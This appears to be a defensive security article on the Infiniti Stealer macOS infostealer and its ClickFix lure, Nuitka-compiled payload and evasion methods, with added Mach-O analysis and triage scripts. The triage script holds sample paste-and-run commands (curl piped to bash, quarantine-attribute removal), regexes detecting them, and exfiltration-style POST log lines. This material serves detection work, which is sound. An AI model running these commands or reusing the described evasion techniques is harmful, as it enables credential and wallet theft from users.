Infiniti Stealer is not a macOS exploit — it weaponizes ClickFix social engineering and Nuitka-compiled Python to bypass defenses
Infiniti Stealer is a recently documented macOS infostealer that relies on a fake CAPTCHA (the ClickFix technique) and a Nuitka-compiled Python payload to evade detection — it succeeds because it manipulates users, not by exploiting a software vulnerability.
How the attack actually reaches a user
In observed samples the initial lure is a Cloudflare-style CAPTCHA page hosted on update-check[.]com that tells the victim to copy a command and paste it into Terminal. That social-engineering method is known as ClickFix: nothing is exploited, the user runs the installer by hand. The pasted command fetches a staged payload, a Bash dropper that writes a second-stage binary into a temporary folder, strips the com.apple.quarantine attribute that would otherwise trigger Gatekeeper's checks, and executes the payload.
Security analysts note the dropper shares code patterns with earlier macOS stealers such as MacSync, which suggests reuse of builder tools or kits. The pattern matters because it explains why detection lags: defenders tune controls for exploits, while these campaigns hinge on convincing users to run the code themselves.
What the installed payload does and how it hides
Instead of shipping a plain Python script, the operators compiled Python 3.11 code into a native Mach-O with Nuitka. At launch the loader unpacks a large embedded archive (about 35 MB in the analyzed sample) and starts the final stealer module. Because Nuitka translates Python to C and builds a native binary, there is no bytecode to pull out and decompile, which raises the bar for analysts and signature-based defenses compared with raw .py files or bundlers such as PyInstaller, whose archives can be unpacked back into .pyc modules.
Once active, Infiniti targets browser credentials, macOS Keychain items, cryptocurrency wallets, developer secrets, and screenshots, exfiltrating the data over HTTP POST and alerting operators through Telegram. It checks for sandboxes and analysis labs (any.run, Joe Sandbox, VMware, VirtualBox) and refuses to run when it detects one, inserts randomized delays to outlast automated detonation windows, and persists through LaunchAgents or cron jobs. It also abuses macOS Accessibility permissions to simulate user interaction, which helps it operate unnoticed.
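The loader's one visible structural trait is that it carries a large archive inside the executable. The following script, added here as an example and not code from the original page or from any vendor report, parses a 64-bit Mach-O's load commands and measures both places such a blob can live: appended past the last segment's file extent (an overlay) or inside one oversized section. The page does not say which layout Nuitka uses, so the script assumes nothing and reports both; compare its output with `otool -l` on a real sample. The Mach-O it analyzes is constructed in memory by `build_sample_macho` and is not executable; the `__DATA,__payload` section name, sizes and thresholds are illustrative.

```python
"""Measure where a 64-bit Mach-O carries a large embedded blob: appended past
the last segment (an overlay) or inside one oversized section.

Added example, not code from the original page or from any vendor report. It
makes no assumption about where Nuitka places its archive; it reports both
candidate locations. The sample Mach-O is constructed in memory (not a real
binary, not executable) and the section name __DATA,__payload is invented.
"""
import struct

MH_MAGIC_64 = 0xFEEDFACF   # 64-bit little-endian Mach-O header magic
LC_SEGMENT_64 = 0x19
CPU_TYPE_ARM64 = 0x0100000C


def _name(raw):
    return raw.rstrip(b"\0").decode("ascii", "replace")


def analyze_macho(data):
    """Walk the load commands and return the file size, the end of the last
    segment's file extent, the overlay size, every section with its size, and
    the largest section. Universal (fat) binaries must be thinned first."""
    if data[:4] == b"\xca\xfe\xba\xbe":
        raise ValueError("universal binary: thin it first (lipo -thin <arch>)")
    if len(data) < 32:
        raise ValueError("too short to be a Mach-O")
    magic, _cpu, _sub, _ftype, ncmds, _szcmds, _flags, _rsv = struct.unpack_from("<8I", data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a 64-bit little-endian Mach-O")
    off, end_of_segments, sections = 32, 0, []
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<2I", data, off)
        if cmd == LC_SEGMENT_64:
            (_seg, _vmaddr, _vmsize, fileoff, filesize,
             _maxprot, _initprot, nsects, _sflags) = struct.unpack_from("<16s4Q4I", data, off + 8)
            end_of_segments = max(end_of_segments, fileoff + filesize)
            sect = off + 72                      # section_64 records follow the 72-byte command
            for _ in range(nsects):
                sectname, segname, _addr, size, _soff = struct.unpack_from("<16s16s2QI", data, sect)
                sections.append((_name(segname) + "," + _name(sectname), size))
                sect += 80                       # sizeof(struct section_64)
        off += cmdsize
    largest = max(sections, key=lambda s: s[1], default=("", 0))
    return {
        "file_size": len(data),
        "end_of_segments": end_of_segments,
        "overlay_bytes": max(0, len(data) - end_of_segments),
        "sections": sections,
        "largest_section": largest,
    }


def locate_embedded_blob(report, min_bytes):
    """Name where a blob of at least min_bytes lives: 'overlay', 'section <name>'
    or None. Pick min_bytes for your estate; tens of MB is the figure in the sample."""
    if report["overlay_bytes"] >= min_bytes:
        return "overlay"
    name, size = report["largest_section"]
    if size >= min_bytes:
        return "section " + name
    return None


# Constructed sample builder: __TEXT,__text plus a __DATA,__payload section of
# the requested size, then optional appended bytes. Hypothetical layout.
def _section(sectname, segname, offset, size):
    return struct.pack("<16s16s2Q8I", sectname, segname, 0x100000000 + offset, size,
                       offset, 0, 0, 0, 0, 0, 0, 0)


def _segment(segname, fileoff, filesize, sections):
    body = b"".join(sections)
    head = struct.pack("<2I16s4Q4I", LC_SEGMENT_64, 72 + len(body), segname,
                       0x100000000 + fileoff, filesize, fileoff, filesize, 7, 5, len(sections), 0)
    return head + body


def build_sample_macho(payload_size, overlay=b""):
    text_off, text_size = 0x1000, 0x100
    payload_off = text_off + text_size
    cmds = _segment(b"__TEXT", 0, payload_off, [_section(b"__text", b"__TEXT", text_off, text_size)])
    cmds += _segment(b"__DATA", payload_off, payload_size,
                     [_section(b"__payload", b"__DATA", payload_off, payload_size)])
    header = struct.pack("<8I", MH_MAGIC_64, CPU_TYPE_ARM64, 0, 2, 2, len(cmds), 0, 0)
    image = bytearray(payload_off + payload_size)   # zero-filled file body
    image[: len(header) + len(cmds)] = header + cmds
    return bytes(image) + overlay


if __name__ == "__main__":
    report = analyze_macho(build_sample_macho(64 * 1024, overlay=b"Z" * 3000))
    print(report["largest_section"], report["overlay_bytes"], locate_embedded_blob(report, 32 * 1024))
```

To use it on a real binary, read the file into `data` and call `analyze_macho(data)`; if it raises on a universal binary, thin the slice you care about with `lipo -thin` first. A large overlay or a section that dwarfs `__text` is a prompt to look closer, not a verdict: legitimate packaged applications also carry big resources.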
Concrete detection signals and immediate steps for responders
Infiniti’s multi-stage chain yields distinct indicators at each hop: web referrals to update-check[.]com or similar fake CAPTCHA pages, Terminal paste-and-run activity, a Bash dropper writing files to /tmp, and a Mach-O that decompresses a large archive at launch. Those are actionable cues for both home users and enterprise teams.
| Stage | Observable indicator | Immediate action |
|---|---|---|
| Delivery (ClickFix) | Referrer to update-check[.]com; a curl-or-wget-piped-to-shell one-liner in shell history (~/.zsh_history) | Block the domain at the web gateway; review shell history; tell users never to run commands a web page asks them to paste |
| Bash dropper | Files written to /tmp or ~/Library that lack the com.apple.quarantine attribute (xattr -l shows nothing); xattr -d or -c in shell history | Scan without altering file attributes so the evidence survives; remove suspicious files; check ~/Library/LaunchAgents and crontab -l |
| Nuitka Mach-O loader | Mach-O carrying a large embedded archive (~35 MB in the sample); unexpected child processes at launch | Isolate the host; capture the binary and process memory; run static and behavioral analysis in a controlled lab |
| Exfiltration & persistence | HTTP POSTs to unknown endpoints; Telegram Bot API traffic (api.telegram.org); new LaunchAgents or cron entries | Block the endpoints; revoke exposed credentials and API keys; rotate secrets from a clean device |
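The table's indicators can be turned into a first-pass triage script. What follows is an added example, not code from the original page or from any vendor report: it scores shell-history lines for the pasted ClickFix one-liner and the dropper's quarantine stripping, flags a LaunchAgent whose program runs from a staging directory, and picks out POSTs to the Telegram Bot API or to hosts off an allowlist in a proxy log. All inputs are constructed sample data; the domain, paths, plist label, Telegram token and IP are illustrative. On a real case, copy ~/.zsh_history, ~/Library/LaunchAgents/*.plist and the proxy log off the host and feed them to these functions.

```python
"""Triage helpers for the four stages in the table above.

Added example, not code from the original page or from any vendor report.
Every input below is constructed sample data; the domain, paths, label,
Telegram token and IP address are illustrative.
"""
import plistlib
import re

# Stage 1, ClickFix: a downloader piped straight into a shell, or a base64
# blob decoded and piped into one, is what the pasted command looks like.
PASTE_AND_RUN = re.compile(
    r"(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    r"|base64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z)?sh\b",
    re.IGNORECASE,
)
# Stage 2, dropper: staging directories and quarantine-attribute removal.
DROPPER_HINTS = re.compile(
    r"xattr\s+-\w*[cd]|com\.apple\.quarantine|/tmp/|/private/tmp/|/var/folders/"
)
SUSPECT_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
# Stage 4, operator alerting: Telegram Bot API calls carry the bot token in the path.
TELEGRAM_BOT = re.compile(r"api\.telegram\.org/bot\d+:[\w-]+/")
POST_LINE = re.compile(r'"POST\s+(?:https?://)?([^/\s]+)(\S*)[^"]*"\s+\d{3}\s+(\d+)')


def triage_history(lines):
    """Return (command, reasons) for history lines matching stage 1 or 2.
    zsh extended-history prefixes (': 1718000000:0;') are stripped first."""
    hits = []
    for raw in lines:
        cmd = re.sub(r"^:\s*\d+:\d+;", "", raw.strip())
        reasons = []
        if PASTE_AND_RUN.search(cmd):
            reasons.append("download or base64 blob piped into a shell")
        if DROPPER_HINTS.search(cmd):
            reasons.append("staging directory or quarantine-attribute removal")
        if reasons:
            hits.append((cmd, reasons))
    return hits


def triage_launch_agent(plist_bytes):
    """Stage 3, persistence: parse one LaunchAgent plist and flag a program that
    lives in a staging directory, hides under Library, or pipes a download into a shell."""
    plist = plistlib.loads(plist_bytes)
    args = plist.get("ProgramArguments") or [plist.get("Program", "")]
    program = args[0] if args else ""
    reasons = []
    if program.startswith(SUSPECT_DIRS):
        reasons.append("program lives in a staging directory")
    if "/Library/" in program and "/." in program:
        reasons.append("program is a hidden file under Library")
    if any(PASTE_AND_RUN.search(a) for a in args):
        reasons.append("arguments download and pipe into a shell")
    autostart = bool(plist.get("RunAtLoad") or plist.get("KeepAlive"))
    return {"label": plist.get("Label"), "program": program,
            "autostart": autostart, "reasons": reasons, "suspicious": bool(reasons)}


def triage_proxy(lines, allowed_hosts):
    """Stage 4, exfiltration: flag POSTs to the Telegram Bot API and POSTs to any
    host outside the allowlist. Lines are combined-log style with the full URL."""
    hits = []
    for line in lines:
        m = POST_LINE.search(line)
        if not m:
            continue
        host, path, size = m.group(1), m.group(2), int(m.group(3))
        if TELEGRAM_BOT.search(host + path):
            hits.append((host, "Telegram Bot API call (operator alert channel)"))
        elif host not in allowed_hosts:
            hits.append((host, f"POST to host outside allowlist ({size} bytes logged)"))
    return hits


# Constructed sample inputs (not real telemetry).
SAMPLE_HISTORY = [
    ": 1718000000:0;curl -fsSL https://update-check[.]com/verify | bash",
    ": 1718000050:0;ls -la ~/Downloads",
    ": 1718000060:0;xattr -d com.apple.quarantine /tmp/.upd/loader",
    ": 1718000070:0;echo aGVsbG8= | base64 -d | sh",
    ": 1718000080:0;git push origin main",
]
SAMPLE_LAUNCH_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.example.updater</string>
<key>ProgramArguments</key><array><string>/tmp/.upd/loader</string><string>--quiet</string></array>
<key>RunAtLoad</key><true/>
<key>KeepAlive</key><true/>
</dict></plist>"""
SAMPLE_PROXY_LOG = [
    '10.0.0.7 - - [12/Jun/2025:10:15:02 +0000] "POST https://api.telegram.org/bot123456789:AAExampleToken_000/sendMessage HTTP/1.1" 200 312 "-" "curl/8.4.0"',
    '10.0.0.7 - - [12/Jun/2025:10:15:05 +0000] "POST https://203.0.113.45/gate.php HTTP/1.1" 200 48 "-" "python-requests/2.31"',
    '10.0.0.7 - - [12/Jun/2025:10:16:00 +0000] "GET https://www.apple.com/ HTTP/1.1" 200 5120 "-" "Safari/605"',
    '10.0.0.7 - - [12/Jun/2025:10:16:30 +0000] "POST https://api.github.com/graphql HTTP/1.1" 200 900 "-" "gh/2.50"',
]

if __name__ == "__main__":
    for cmd, why in triage_history(SAMPLE_HISTORY):
        print("history:", cmd, "->", "; ".join(why))
    print("launch agent:", triage_launch_agent(SAMPLE_LAUNCH_AGENT))
    for host, why in triage_proxy(SAMPLE_PROXY_LOG, {"api.github.com"}):
        print("proxy:", host, "->", why)
```

Treat the output as leads to verify by hand: developers legitimately pipe installers into a shell and write to /tmp, so the value is in the combination of a pasted one-liner, a quarantine strip, a LaunchAgent in a staging path and a Telegram call from the same host within minutes, not in any one hit.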
Quick Q&A
Did Infiniti exploit macOS vulnerabilities? No — observed samples use social engineering (ClickFix) to get users to run a command rather than exploiting a software flaw.
What should an affected user do now? Stop sensitive activity on the device, move to a known-clean machine, change passwords and revoke keys from there, scan the Mac with a reputable tool (e.g., Malwarebytes), and inspect ~/Library/LaunchAgents, /Library/LaunchAgents, the output of launchctl list, and crontab -l for entries you did not create.
What to watch next and the decision checkpoint for defenders
The key question is whether ClickFix delivery paired with Nuitka compilation becomes a standard tactic across macOS campaigns. Microsoft has reported a rapid expansion of infostealers on macOS driven by cross-platform languages like Python; if other operators adopt Nuitka for obfuscation, defenders will face more compiled-Python samples that evade script-focused detection.
Watch for: more domains mimicking update-check[.]com, reuse of MacSync-like dropper code, and vendor reports of further Nuitka-compiled Mach-O samples. For procurement and operations teams the practical decision lens is this: if you see repeated paste-to-Terminal infections or a rising number of large-embedded-archive Mach-O binaries in your estate, prioritize web filtering and endpoint controls that intercept social-engineering delivery and inspect native binaries, rather than relying solely on script-scanning rules.

